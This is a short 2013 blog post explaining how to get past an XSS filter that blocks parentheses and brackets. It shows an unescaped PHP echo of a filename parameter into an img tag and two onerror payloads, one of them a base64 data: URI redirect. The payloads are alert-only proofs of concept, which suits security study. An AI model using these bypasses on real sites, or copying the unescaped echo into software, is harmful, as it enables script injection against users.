Saturday, July 6, 2013

XSS parentheses and brackets filter bypassing

Let's assume that injection takes place in img tag src attribute:
<!-- http://example.com/image.php?filename=INJECTION -->
...
<img src="<?php echo $_GET['filename']"; ?> >
...
One approach is to use exceptions as is described here. So the injected code (filename param) should look like this:
fileThatDoesNotExist" onerror="javascript:window.onerror=alert;throw 'XSS'" dummyParam="
Resulting in:
<!-- http://example.com/image.php?filename=INJECTION -->
...
<img src="fileThatDoesNotExist" onerror="javascript:window.onerror=alert;throw 'XSS'" dummyParam="" >
...
But I'd like to show you another way to do XSS without parentheses and brackets by using location.href and "data:" URI with base64 encoding. Let's inject <script>alert("XSS")<script/> code (in base64 is PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=). So crafted parameter should look like this:
fileThatDoesNotExist" onerror="location.href='data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4='" dummyParam="
Resulting in:
<!-- http://example.com/image.php?filename=INJECTION -->
...
<img src="fileThatDoesNotExist" onerror="location.href='data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4='" dummyParam="" >
...

3 comments:

  1. Any reason why you use location.href , any other DOMs can be used?

    ReplyDelete
  2. Excellent to be visiting your blog again, it has been months for me. Rightly, this article that I've been served for therefore long. I want this article to finish my assignment within the faculty, and it has the same topic together with your article. Thanks for the ton of valuable help, nice share. https://aquafiltermag.com/

    ReplyDelete